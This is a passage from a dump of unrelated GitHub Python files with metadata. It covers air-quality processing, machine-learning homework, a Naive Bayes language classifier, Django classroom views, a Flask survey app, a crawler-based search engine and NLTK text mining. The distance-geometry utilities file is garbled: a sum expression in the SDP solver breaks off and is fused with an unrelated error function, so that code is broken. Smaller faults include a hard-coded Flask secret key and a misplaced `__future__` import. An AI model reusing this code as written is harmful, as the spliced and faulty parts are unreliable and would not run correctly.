None,\n \"O3\": None,\n \"SO2\": None,\n \"NO2\": None,\n \"BC\": None\n }\n for measurement in entry['measurements']:\n if measurement['parameter'] == \"pm10\":\n values[entry['location']][\"PM10\"] = {\n 'index': air.air_index_pm10(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"pm25\":\n values[entry['location']][\"PM25\"] = {\n 'index': air.air_index_pm25(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"co\":\n values[entry['location']][\"CO\"] = {\n 'index': air.air_index_co(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"so2\":\n values[entry['location']][\"SO2\"] = {\n 'index': air.air_index_so2(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"no2\":\n values[entry['location']][\"NO2\"] = {\n 'index': air.air_index_no2(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"o3\":\n values[entry['location']][\"O3\"] = {\n 'index': air.air_index_o3(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"bc\":\n values[entry['location']][\"BC\"] = {\n 'index': air.air_index_so2(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n return values\n\n def execute(self):\n data = self._fetch_data(self._get_url())\n if data:\n return self._normalize(data)\n\n return {}\n","repo_name":"bkosciow/sensor_listener","sub_path":"node_listener/worker/openaq_worker.py","file_name":"openaq_worker.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22677729454","text":"import numpy as np\n\nx1 = np.array([1, 1, -1, 1, 3])\nx2 = np.array([-1,1,1,2,-1])\nx3 = np.array([2,3,0,-4,-1])\nx = np.array([x1, x2, x3]).T\n\ny = np.array([1,4,-1,-2,0]).T\nw = np.array([-1,1,-1])\nb = -1\n\ndb = y - np.dot(x,w) - b\ndw = x.T.dot(db) / 5\ndb = 1/5 * db\nprint('dw is ',dw)\nprint('db is ', db)\n\nw = np.zeros(4)\nlr = 0.1\nx = np.array([x1, x2, x3, np.ones(5)]).T\ndb = 0\ndw = np.zeros(4)\n\nfor i in np.arange(5):\n ins = y[i] - np.dot(x[i],w)\n dw += x[i].T.dot(ins) / (i + 1)\n print('stochastic gradient at example ', i + 1, ' is ', dw)\n\n w = w - lr * dw\n\n print('[w1, w2, w3, b] = ', w)","repo_name":"sabinamiani/ML-tech","sub_path":"cs5350hw2q5.py","file_name":"cs5350hw2q5.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19694064916","text":"import sklearn\r\nimport nltk\r\nimport csv\r\nimport re\r\nimport numpy\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom __future__ import print_function\r\n\r\ndef GetData():\r\n\twith open('train_set_x.csv') as csvfile:\r\n\t\treadTest = csv.reader(csvfile, delimiter=',')\r\n\t\ttrainData = []\r\n\t\tfor row in readTest:\r\n\t\t\ttrainData.append(row[1])\r\n\t\t\r\n\t\ttrainData.pop(0)\r\n\treturn trainData\r\n\r\ndef GetData2():\r\n\twith open('test_set_x.csv') as csvfile:\r\n\t\treadTest = csv.reader(csvfile, delimiter=',')\r\n\t\ttrainData = []\r\n\t\tfor row in readTest:\r\n\t\t\ttrainData.append(row[1])\r\n\t\t\r\n\t\ttrainData.pop(0)\r\n\treturn trainData\r\n\r\ndef GetTarget():\r\n\twith open('train_set_y.csv') as csvfile:\r\n\t\treadTest = csv.reader(csvfile, delimiter=',')\r\n\t\ttestTarget = []\r\n\t\tfor row in readTest:\r\n\t\t\ttestTarget.append(row[1])\r\n\t\ttestTarget.pop(0)\r\n\treturn testTarget\r\n\r\nprobs={}\r\ndef proportions(c):\r\n if c not in probs:\r\n i=0\r\n numLetter=[0,0,0,0,0]\r\n for sentence in trainDataLetterized:\r\n for letter in sentence:\r\n if letter==c:\r\n numLetter[int(testTarget[i])]+=1\r\n i+=1\r\n probLetter=[]\r\n i=0\r\n for num in numLetter:\r\n probLetter.append(num/float(numLang[i]))\r\n i+=1\r\n probs[c]=probLetter\r\n return probs[c]\r\n\r\ntrainData=GetData()\r\ntrainDataLetterized=[]\r\nfor sentence in trainData:\r\n trainDataLetterized.append(list(sentence))\r\n\r\ntestTarget=GetTarget()\r\n\r\nnumLang=[0,0,0,0,0]\r\notherNumLang=[0,0,0,0,0]\r\ni=0\r\nfor sentence in trainDataLetterized:\r\n otherNumLang[int(testTarget[i])]+=1\r\n for letter in sentence:\r\n if letter!=' ':\r\n numLang[int(testTarget[i])]+=1\r\n i+=1\r\n\r\ntestData=GetData2()\r\ntestDataLetterized=[]\r\nfor sentence in testData:\r\n testDataLetterized.append(list(sentence))\r\ntotal=len(trainData) \r\nfrequency=[]\r\nfor num in otherNumLang:\r\n frequency.append(num/float(total)) \r\nguess=[]\r\nfor sentence in testDataLetterized:\r\n product=[1,1,1,1,1]\r\n for character in sentence:\r\n if character != ' ':\r\n for i in range(5):\r\n product[i]*=proportions(character)[i]\r\n maxIndex=0\r\n for i in range(5):\r\n product[i]*=frequency[i]\r\n for i in range(5):\r\n if product[i]>product[maxIndex]:\r\n maxIndex=i\r\n guess.append(maxIndex)\r\n\r\nwith open(\"theoutput.csv\",'wb') as predictions:\r\n\t\twr = csv.writer(predictions, delimiter=',')\r\n\t\twr.writerow(['Id','Category'])\r\n\t\tfor idx, value in enumerate(guess):\r\n\t\t\twr.writerow([idx, value])","repo_name":"msalihs/COMP-551-Project-2","sub_path":"Naive Bayes/naivebayes.py","file_name":"naivebayes.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6903400058","text":"import sqlite3\n\nconnect = sqlite3.connect('emaildb.sqlite')\ncur = connect.cursor()\n\ncur.execute('''\nDROP TABLE IF EXISTS Counts''')\n\ncur.execute('''\nCREATE TABLE Counts (org TEXT, count INTEGER)''')\n\nfilename = raw_input('Enter file name: ')\nif len(filename) < 1:\n filename = 'mbox.txt'\n\ndbhandle = open(filename)\nfor line in dbhandle:\n\n if not line.startswith('From: '):\n continue\n else:\n email = line.split()[1]\n org = email.split('@')[1]\n cur.execute('SELECT count FROM Counts WHERE org = ? ', (org, ))\n\n try:\n count = cur.fetchone()[0]\n cur.execute('UPDATE Counts SET count=count+1 WHERE org = ?', (org, ))\n except:\n cur.execute('INSERT INTO Counts (org, count) VALUES (?, 1)', (org, ))\nconnect.commit()\n","repo_name":"UncleGarden/python-sqlite","sub_path":"email/emaildb.py","file_name":"emaildb.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23016935762","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views import View\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.contrib import messages\nfrom django.apps import apps\nfrom django.http import Http404\nfrom django.forms import modelform_factory\nfrom .models import Classroom, Stream\nfrom .forms import CreateClassForm, JoinClassForm\nfrom django import forms\nfrom django.utils import timezone\n\n\nclass HomeView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n user = self.request.user\n if user.is_teacher:\n classrooms = user.classrooms.all()\n form = CreateClassForm()\n else:\n classrooms = Classroom.objects.filter(\n students__in=[self.request.user]\n )\n form = JoinClassForm()\n return render(request, 'home.html', {'classrooms': classrooms, 'form': form})\n\n\nclass CreateClassView(LoginRequiredMixin, UserPassesTestMixin, View):\n def post(self, request, *args, **kwargs):\n form = CreateClassForm(data=self.request.POST)\n if form.is_valid():\n return self.form_valid(form)\n return self.form_invalid(form)\n\n def form_valid(self, form):\n form.instance.teacher = self.request.user\n form.save()\n messages.info(self.request, 'Classroom Created!')\n return redirect('home')\n\n def form_invalid(self, form):\n messages.warning(\n self.request, 'Some Error Occured: Classroom Not Created!')\n return redirect('home')\n\n def test_func(self):\n return self.request.user.is_teacher\n\n\nclass JoinClassView(LoginRequiredMixin, UserPassesTestMixin, View):\n def post(self, request, *args, **kwargs):\n form = JoinClassForm(data=self.request.POST)\n if form.is_valid():\n return self.form_valid(form)\n return self.form_invalid(form)\n\n def form_valid(self, form):\n classroom = Classroom.objects.filter(code=form.cleaned_data['code'])\n if classroom.exists():\n classroom.first().students.add(self.request.user)\n messages.info(self.request, 'Classroom Joined!')\n return redirect('home')\n messages.info(self.request, 'Classroom Not Found!')\n return redirect('home')\n\n def form_invalid(self, form):\n messages.warning(\n self.request, 'Some Error Occured: Classroom Not Joined!')\n return redirect('home')\n\n def test_func(self):\n return not self.request.user.is_teacher\n\n\nclass DashboardView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n classroom = get_object_or_404(Classroom, code=self.kwargs['code'])\n streams = classroom.streams.all()\n if self.request.user.is_teacher:\n upcoming_tests = classroom.classroom_test.filter(\n due_date__gt=timezone.now()\n )\n upcoming_assignments = classroom.classroom_assignment.filter(\n due_date__gt=timezone.now()\n )\n else:\n upcoming_tests = classroom.classroom_test.filter(\n due_date__gt=timezone.now(),\n ).exclude(test_submissions__student__in=[self.request.user])\n upcoming_assignments = classroom.classroom_assignment.filter(\n due_date__gt=timezone.now()\n ).exclude(assignment_submissions__student__in=[self.request.user])\n return render(request, \"dashboard.html\", {'classroom': classroom, 'streams': streams, 'upcoming_tests': upcoming_tests, 'upcoming_assignments': upcoming_assignments})\n\n# for teacher to create and update stream\n\n\nclass StreamCreateUpdateView(LoginRequiredMixin, UserPassesTestMixin, View):\n def get(self, request, *args, **kwargs):\n self.set_objects()\n form = self.get_form(instance=self.stream_obj)\n return render(request, 'partials/stream_form.html', {'form': form, 'model_name': self.model_name, 'code': self.kwargs['code'], 'stream_id': self.stream_id, 'stream_obj': self.stream_obj})\n\n def post(self, request, *args, **kwargs):\n self.set_objects()\n form = self.get_form(\n instance=self.stream_obj, data=self.request.POST, files=self.request.FILES\n )\n if form.is_valid():\n form.instance.classroom = get_object_or_404(\n Classroom, code=self.kwargs['code'], teacher=self.request.user\n )\n form.instance.teacher = self.request.user\n stream_obj = form.save()\n # if new object is created\n if self.stream_obj is None:\n Stream.objects.create(\n classroom=stream_obj.classroom,\n stream_obj=stream_obj\n )\n messages.success(self.request, 'Stream Updated !')\n return redirect('dashboard', self.kwargs['code'])\n\n messages.warning(self.request, 'Some Error Occured !')\n return redirect('dashboard', self.kwargs['code'])\n\n def get_model(self, model_name):\n if model_name in ('announcement', 'test', 'assignment',):\n return apps.get_model(app_label='classroom', model_name=model_name)\n raise Http404()\n\n def get_form(self, *args, **kwargs):\n form = modelform_factory(self.model,\n exclude=('classroom', 'teacher'),\n widgets={\n 'due_date': forms.DateInput(attrs={'type': 'date'})\n }\n )\n return form(*args, **kwargs)\n\n def set_objects(self):\n self.model_name = self.kwargs['model_name']\n self.model = self.get_model(self.model_name)\n self.stream_obj = None\n self.stream_id = self.kwargs.get('stream_id')\n if self.stream_id:\n self.stream_obj = get_object_or_404(\n self.model, id=self.stream_id, teacher=self.request.user\n )\n\n def test_func(self):\n return self.request.user.is_teacher\n\n# for teacher to delete stream\n\n\nclass StreamDeleteView(LoginRequiredMixin, View):\n def post(self, request, *args, **kwargs):\n stream = get_object_or_404(Stream, id=self.kwargs['stream_id'])\n stream_obj = stream.stream_obj\n if stream_obj.teacher != self.request.user:\n raise Http404()\n classroom = stream_obj.classroom\n stream_obj.delete()\n stream.delete()\n messages.success(self.request, 'Stream Updated !')\n return redirect('dashboard', classroom.code)\n\n# detail view for stream (student)\n\n\nclass StreamDetailView(LoginRequiredMixin, UserPassesTestMixin, View):\n def get(self, request, *args, **kwargs):\n model_name = self.kwargs['model_name']\n model_id = self.kwargs['model_id']\n submission_id = None\n if model_name == 'assignment':\n model = apps.get_model(\n app_label='classroom', model_name='assignment'\n )\n submission_model = get_object_or_404(\n model, id=model_id\n )\n submission = submission_model.assignment_submissions.filter(\n student__in=[self.request.user]\n )\n elif model_name == 'test':\n model = apps.get_model(\n app_label='classroom', model_name='test'\n )\n submission_model = get_object_or_404(\n model, id=model_id\n )\n submission = submission_model.test_submissions.filter(\n student__in=[self.request.user]\n )\n else:\n raise Http404()\n form = modelform_factory(model, fields=('text', 'attachment',))\n if submission.exists():\n submission_id = submission[0].id\n form = form(instance=submission[0])\n else:\n form = form()\n return render(request, \"partials/submission_form.html\", {'form': form, 'submission_model': submission_model, \"submission_id\": submission_id, 'model_name': model_name, 'model_id': model_id})\n\n def test_func(self):\n return not self.request.user.is_teacher\n\n# submission view for students\n\n\nclass SubmissionCreateUpdateView(LoginRequiredMixin, UserPassesTestMixin, View):\n def get(self, request, *args, **kwargs):\n self.set_objects()\n form = self.get_form(instance=self.submission)\n return render(request, \"partials/submission_form.html\", {'form': form, 'submission_model': self.submission_model, 'submission_id': self.submission_id, 'model_name': self.model_name, 'model_id': self.model_id})\n\n def post(self, request, *args, **kwargs):\n self.set_objects()\n form = self.get_form(\n instance=self.submission, data=self.request.POST, files=self.request.FILES\n )\n if form.is_valid():\n form.instance.student = self.request.user\n if self.submission_model.due_date > timezone.now():\n form.instance.status = 'D'\n else:\n form.instance.status = 'L'\n submission = form.save(commit=False)\n # if new object is created\n if self.submission is None:\n if self.model_name == 'test':\n submission.test = self.submission_model\n else:\n submission.assignment = self.submission_model\n submission = form.save()\n messages.success(\n self.request, f'{self.submission_model.title} ({self.model_name}) Submited !'\n )\n return redirect('dashboard', self.submission_model.classroom.code)\n\n messages.warning(self.request, 'Some Error Occured !')\n return redirect('dashboard', self.submission_model.classroom.code)\n\n def get_model(self, model_name):\n if model_name in ('assignment', 'test',):\n return apps.get_model(app_label='classroom', model_name=f'{model_name}submission')\n return Http404()\n\n def get_form(self, *args, **kwargs):\n form = modelform_factory(self.model, fields=('text', 'attachment',))\n return form(*args, **kwargs)\n\n def get_submission_model(self, model_id, model_name):\n if model_name in ('assignment', 'test',):\n model = apps.get_model(\n app_label='classroom', model_name=model_name\n )\n return get_object_or_404(model, id=model_id)\n return Http404()\n\n def set_objects(self):\n self.model_name = self.kwargs['model_name']\n # model(table) of test or assignment submissions\n self.model = self.get_model(self.model_name)\n # model_id for associating submission with respective assignment/test\n self.model_id = self.kwargs['model_id']\n self.submission_model = self.get_submission_model(\n self.model_id, self.model_name\n )\n # submission of test or assignment\n self.submission = None\n self.submission_id = self.kwargs.get('submission_id')\n if self.submission_id:\n self.submission = get_object_or_404(\n self.model, id=self.submission_id\n )\n\n def test_func(self):\n return not self.request.user.is_teacher\n","repo_name":"DireWolf707/Online-Classroom","sub_path":"classroom/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33793083902","text":"from sys import stdin\n\nn = stdin.readline().rstrip()\nm = int(stdin.readline())\nd = set(stdin.readline().split())\nbutton = set(str(x) for x in range(10))\nif m > 0:\n button -= d\n\nnow_chan = 100\nres = abs(now_chan - int(n))\n\nfor channel in range(1000000):\n for j in range(len(str(channel))):\n if str(channel)[j] not in button:\n break\n elif len(str(channel)) - 1 == j:\n res = min(res, abs(channel - int(n)) + len(str(channel)))\n\nprint(res)\n","repo_name":"hunnam5220/Solved_ac","sub_path":"100. CLASS/CLASS 3/impossible/1107._*_*_*_ 리모컨.py","file_name":"1107._*_*_*_ 리모컨.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4045958389","text":"import scipy as scp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cvxpy as cp\nfrom amplpy import AMPL \n\n#convert a distance matrix to a Gram matrix\ndef dist2Gram(D):\n n = D.shape[0]\n J = np.eye(n) - (1.0/n)*np.ones((n,n))\n G = -0.5 * J @ (D*D) @ J\n return G\n\n#principal component analysis\ndef PCA(A,K=2):\n n = A.shape[0]\n evals,evecs = np.linalg.eigh(A)\n evals[evals < 0] = 0 # closest SDP matrix\n sqrootdiag = np.sqrt(np.diag(evals))\n X = evecs @ sqrootdiag\n return X[:,n-K:]\n\ndef solve_SDP(D, adjacency_list):\n n = len(adjacency_list)\n G = cp.Variable((n,n), PSD=True) #estimated gram matrix\n \n obj1 = sum([G[i,i]+G[j,j]-2*G[i,j] for i in range(n) for j in adjacency_list[i] if in]))\n return np.mean(errors) \n\ndef LDE(X,D,adjacency_list):\n errors=np.array([])\n for v,a_list in enumerate(adjacency_list):\n errors=np.hstack((errors,\n [np.abs(np.linalg.norm(X[v]-X[n])-D[v,n]) for n in a_list if v>n]))\n return np.max(errors) \n\ndef generate_random_points(N,bounds=np.array([[-1,1],[-1,1]])):\n x_bounds,y_bounds=bounds\n points_x = np.random.uniform(x_bounds[0],x_bounds[1],size=N)\n points_y = np.random.uniform(y_bounds[0],y_bounds[1],size=N)\n return np.transpose(np.vstack((points_x,points_y))) ","repo_name":"Nikita-Dudorov/DGP_planar_graph","sub_path":"code/DGP_utils.py","file_name":"DGP_utils.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9361387483","text":"# -*- coding: utf-8 -*-\n\n'''\nGiven an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0?\nFind all unique triplets in the array which gives the sum of zero.\n\nNote:\nThe solution set must not contain duplicate triplets.\n\nExample:\nGiven array nums = [-1, 0, 1, 2, -1, -4]\nA solution set is:\n[\n [-1, 0, 1],\n [-1, -1, 2]\n]\n'''\n\n\nclass Solution(object):\n\n def three_sum(self, nums):\n length = len(nums)\n if length < 3:\n return []\n\n nums.sort()\n result = []\n for left in range(length - 2):\n if nums[left] > 0:\n break\n if left > 0 and nums[left] == nums[left - 1]:\n continue\n mid, right = left + 1, length - 1\n target = -nums[left]\n while mid < right:\n if nums[mid] + nums[right] == target:\n result.append([nums[left], nums[mid], nums[right]])\n tmp_mid, tmp_right = nums[mid], nums[right]\n while mid < right and nums[mid] == tmp_mid:\n mid += 1\n while mid < right and nums[right] == tmp_right:\n right -= 1\n elif nums[mid] + nums[right] < target:\n mid += 1\n else:\n right -= 1\n \n return result\n\n\nif __name__ == '__main__':\n nums = [-1, 0, 1, 2, -1, -4]\n s = Solution()\n print(s.three_sum(nums))\n\n","repo_name":"lilanxing/leetcode","sub_path":"15_3sum/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41939719318","text":"# this calls all the tools needed\n# also ties in the surveys.py to this code.\nfrom flask import Flask, request, render_template, redirect, flash, session\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom surveys import satisfaction_survey\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = \"chickenzarenotcool\"\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\ndebug = DebugToolbarExtension(app)\n\n# this is where we store the responses\n# a variable to help with functions\n# route to home page, has survey start button.\n@app.route('/')\ndef home():\n return render_template('base.html')\n# pulls questions and answers from surveys.py and generates them\n@app.route(f'/questions/')\ndef question(qnum):\n# the if else is there to assure they answer the questions in order. \n# Prevents skipping around.\n # this first will check if they answered all the questions already.\n print(f\"{qnum} is qnum\")\n #the session way to make the cookie session usable\n responses = session['response']\n session['response'] = responses\n if qnum <= len(satisfaction_survey.questions):\n if qnum == len(responses)+1:\n question = satisfaction_survey.questions[qnum-1].question\n choices = satisfaction_survey.questions[qnum-1].choices\n return render_template('questions.html', question = question, choices = choices)\n else:\n # this if/else responds if the URL is messed with.\n if qnum != 0:\n return redirect(f'/questions/{len(responses)+1}')\n else:\n # flashes a message if they try to jump questions.\n flash(\"Don't mess with the URL. . . \")\n return redirect(f'/questions/{len(responses)+1}')\n\n # this else will thank them if they already answered all the questions and try to start again.\n else:\n return render_template('thanks.html')\n\n\n# this route processes the answers and adds them to the responses list.\n@app.route('/answer', methods=[\"POST\"])\ndef answer():\n choice = request.form['choice']\n #the session way to make the cookie session usable\n responses = session['response']\n responses.append(choice)\n session['response'] = responses\n print (f'{len(responses)} is len')\n# if else checks the length of survey and when they complete all questions\n if (len(responses)= %s' % (','.join(['%s' for _ in words]), '%s'), words + [threshold])\n else:\n cursor.execute('SELECT DISTINCT page_id FROM inverted_index WHERE word_id IN (SELECT id FROM words WHERE word IN (%s))' % ','.join(['%s' for _ in words]), words)\n \n results = cursor.fetchall()\n\n page_counts = {}\n for result in results:\n page_id = result[0]\n count = 0\n for word in words:\n cursor.execute('SELECT count FROM inverted_index WHERE word_id = (SELECT id FROM words WHERE word = %s) AND page_id = %s', (word, page_id))\n result = cursor.fetchone()\n if result is not None:\n count += result[0]\n page_counts[page_id] = count\n\n # Sort the pages by the number of occurrences of the search words in each page\n sorted_pages = sorted(page_counts.items(), key=lambda x: x[1], reverse=True)\n\n # Get the URLs for the top 10 pages and return them\n urls = []\n for page_id, count in sorted_pages[:10]:\n cursor.execute('SELECT url FROM pages WHERE id = %s', (page_id,))\n result = cursor.fetchone()\n if result is not None:\n urls.append(result[0])\n conn.close()\n\n return urls[0]\n\n def wn_search(self,query, threshold=None):\n # Preprocess query\n stemmer = SnowballStemmer('english')\n words = [stemmer.stem(w.lower()) for w in query.split()]\n\n self.logger.info(f'Searching WN for {query}')\n\n # Find similar words using WordNet\n synsets = []\n for word in words:\n synset = wordnet.synsets(word)\n if synset:\n synsets.append(synset)\n similar_words = set()\n for synset in synsets:\n for lemma in synset[0].lemmas():\n similar_word = stemmer.stem(lemma.name().lower())\n if similar_word not in words:\n similar_words.add(similar_word)\n v = ' '.join(list(similar_words))\n\n self.logger.info(f'WN words: {v}')\n\n # Add similar words to search words\n words = list(similar_words)\n\n conn = self.create_connection()\n cursor = conn.cursor()\n\n # Get the page IDs for all pages that contain any of the words\n if threshold is not None:\n cursor.execute('SELECT DISTINCT page_id FROM inverted_index '\n 'JOIN pages ON inverted_index.page_id = pages.id '\n 'WHERE word_id IN (SELECT id FROM words WHERE word IN (%s)) '\n 'AND sentiment >= %s' % (','.join(['%s' for _ in words]), '%s'), words + [threshold])\n else:\n cursor.execute('SELECT DISTINCT page_id FROM inverted_index WHERE word_id IN (SELECT id FROM words WHERE word IN (%s))' % ','.join(['%s' for _ in words]), words)\n \n results = cursor.fetchall()\n\n page_counts = {}\n for result in results:\n page_id = result[0]\n count = 0\n for word in words:\n cursor.execute('SELECT count FROM inverted_index WHERE word_id = (SELECT id FROM words WHERE word = %s) AND page_id = %s', (word, page_id))\n result = cursor.fetchone()\n if result is not None:\n count += result[0]\n page_counts[page_id] = count\n\n # Sort the pages by the number of occurrences of all search words in each page\n sorted_pages = sorted(page_counts.items(), key=lambda x: x[1], reverse=True)\n\n # Get the URLs for the top 10 pages and return them\n urls = []\n for page_id, count in sorted_pages[:10]:\n cursor.execute('SELECT url FROM pages WHERE id = %s', (page_id,))\n result = cursor.fetchone()\n if result is not None:\n urls.append(result[0])\n conn.close()\n\n return urls[0]\n\n \"\"\" GENERATE CONTENT \"\"\"\n def generate_content(self, query, threshold=None):\n words = self._preprocess(query)\n self.logger.info(f'Searching for {query}')\n conn = self.create_connection()\n cursor = conn.cursor()\n\n # Get the page IDs for all pages that contain any of the words\n if threshold is not None:\n cursor.execute('SELECT DISTINCT page_id FROM inverted_index '\n 'JOIN pages ON inverted_index.page_id = pages.id '\n 'WHERE word_id IN (SELECT id FROM words WHERE word IN (%s)) '\n 'AND sentiment >= %s' % (','.join(['%s' for _ in words]), '%s'), words + [threshold])\n else:\n cursor.execute('SELECT DISTINCT page_id FROM inverted_index WHERE word_id IN (SELECT id FROM words WHERE word IN (%s))' % ','.join(['%s' for _ in words]), words)\n \n results = cursor.fetchall()\n\n page_counts = {}\n for result in results:\n page_id = result[0]\n count = 0\n for word in words:\n cursor.execute('SELECT count FROM inverted_index WHERE word_id = (SELECT id FROM words WHERE word = %s) AND page_id = %s', (word, page_id))\n result = cursor.fetchone()\n if result is not None:\n count += result[0]\n page_counts[page_id] = count\n\n # Sort the pages by the number of occurrences of the search words in each page\n sorted_pages = sorted(page_counts.items(), key=lambda x: x[1], reverse=True)\n\n # Get the URLs for the top 10 pages and return them\n urls = []\n for page_id, count in sorted_pages[:10]:\n cursor.execute('SELECT url FROM pages WHERE id = %s', (page_id,))\n result = cursor.fetchone()\n if result is not None:\n urls.append(result[0])\n conn.close()\n\n url = urls[0]\n print(url)\n # Fetch the content for each URL\n conn = self.create_connection()\n cursor = conn.cursor()\n contents = []\n cursor.execute('SELECT content FROM pages WHERE url = %s', (url,))\n result = cursor.fetchone()\n if result is not None:\n contents.append(result[0])\n conn.close()\n # Concatenate the fetched contents\n text = \" \".join(contents)\n\n # Generate a phrase using the Markov chain model\n text_model = markovify.Text(text)\n generated_content = text_model.make_sentence()\n\n return generated_content\n\n \"\"\" GENERATE CONTENT WITH CHAT GPT\"\"\"\n def chat_gpt(self, query, threshold=None):\n\n \n generator = pipeline('text-generation', model='gpt2')\n set_seed(42)\n # Extract the generated message from the API response\n generated_message = generator(query, max_length=30, num_return_sequences=5)\n\n return generated_message[0]['generated_text']","repo_name":"heliopn/red_crow","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":15782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20988630108","text":"\"\"\"\nnltk_content_words.py\n\nCreated on Wed Jul 19 2023\n\n@author: Lukas\n\nThis file contains all methods for mining content words using NLTK.\n\"\"\"\n\n# import packages\n\nimport numpy as np\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom spellchecker import SpellChecker\nfrom nltk.corpus import wordnet\nfrom nltk.tokenize import word_tokenize\n\n\nspell = SpellChecker()\n\nnltk.download('stopwords')\nnltk.download('punkt')\nnltk.download('averaged_perceptron_tagger')\nnltk.download('wordnet')\n\n\n# Define functions\n\ndef remove_punctuation(documents: list) -> list:\n \"\"\"\n Given a list of documents, removes all punctuation from each document.\n Punctuation includes all symbols in the string \"symbols\" below.\n\n Parameters\n ----------\n documents : A list of documents, where each document is a string.\n\n Returns\n ----------\n A list of documents, where each document is a string with no punctuation.\n \"\"\"\n symbols = \"!\\\"#$%&()*+-,/:;<=>?@[\\]'^_`{|}~\"\n\n no_punct_documents = []\n for document in documents:\n for i in symbols:\n document = document.replace(i, '')\n if len(document) > 0:\n no_punct_documents.append(document)\n\n return no_punct_documents\n\n\ndef merge_across_linebreaks(documents: list) -> list:\n \"\"\"\n Given a list of documents, merges two parts of a word\n that are separated by a linebreak.\n\n Parameters\n ----------\n documents : A list of documents, where each document is a string.\n\n Returns\n ----------\n A list of documents, where each document is a string with no linebreaks.\n \"\"\"\n merged_documents = []\n for document in documents:\n merged_documents.append(document.replace('-\\n', ''))\n\n return merged_documents\n\n\ndef get_nltk_content_words(documents: list) -> list:\n \"\"\"\n Given a list of documents, returns a list of content words.\n\n Parameters\n ----------\n documents : A list of documents, where each document is a string.\n\n Returns\n ----------\n A list of content words.\n \"\"\"\n all_content_words = set()\n\n for document in documents:\n text = word_tokenize(document)\n pos_tags = nltk.pos_tag(text)\n\n unknown_words = []\n\n # for each noun, check if it is contained in the spellchecker dictionary\n # by using spell.unknown(). If not, add it to the list of unknown words.\n for word, tag in pos_tags:\n if tag in ['NN', 'NNS', 'NNP', 'NNPS']:\n if word.lower() in spell.unknown([word.lower()]):\n # merge it with the next word and check if the merged word is in the spellchecker dictionary\n if pos_tags.index((word, tag)) < len(pos_tags) - 1:\n next_word = pos_tags[pos_tags.index((word, tag)) + 1][0]\n merged_word = word + '' + next_word\n if merged_word.lower() in spell.unknown([merged_word.lower()]):\n unknown_words.append(word)\n\n # get content words by selecting all nouns, i.e. 'NN', 'NNS', 'NNP', 'NNPS'\n content_words_raw = [word[0] for word in pos_tags if word[1] in ['NN', 'NNS', 'NNP', 'NNPS']]\n\n # remove stopwords\n content_words = clean_content_words(content_words_raw)\n\n # remove words that are in content_words_raw but not in content_words from pos_tags\n pos_tags = [word for word in pos_tags if not (word[0] in content_words_raw and word[0] not in content_words)] \n\n\n # merge adjacent nouns, replace the two with the merged noun in the pos_tags list\n # repeat this process until no more merges are possible\n while True:\n merged = False\n for i in range(len(pos_tags) - 1):\n if pos_tags[i][1] in ['NN', 'NNS', 'NNP', 'NNPS'] and pos_tags[i+1][1] in ['NN', 'NNS', 'NNP', 'NNPS']:\n pos_tags[i] = (pos_tags[i][0] + ' ' + pos_tags[i+1][0], 'NN')\n pos_tags.pop(i+1)\n merged = True\n break\n if not merged:\n break\n\n # merge preceding adjectives with nouns, replace the two with the merged noun in the pos_tags list\n # repeat this process until no more merges are possible\n while True:\n merged = False\n for i in range(len(pos_tags) - 1):\n if pos_tags[i][1] in ['JJ', 'JJR', 'JJS'] and pos_tags[i+1][1] in ['NN', 'NNS', 'NNP', 'NNPS']:\n pos_tags[i] = (pos_tags[i][0] + ' ' + pos_tags[i+1][0], 'NN')\n pos_tags.pop(i+1)\n merged = True\n break\n if not merged:\n break\n\n # clean content words\n content_words = clean_content_words([word[0] for word in pos_tags if word[1] in ['NN', 'NNS', 'NNP', 'NNPS']])\n\n # add to set of all content words\n 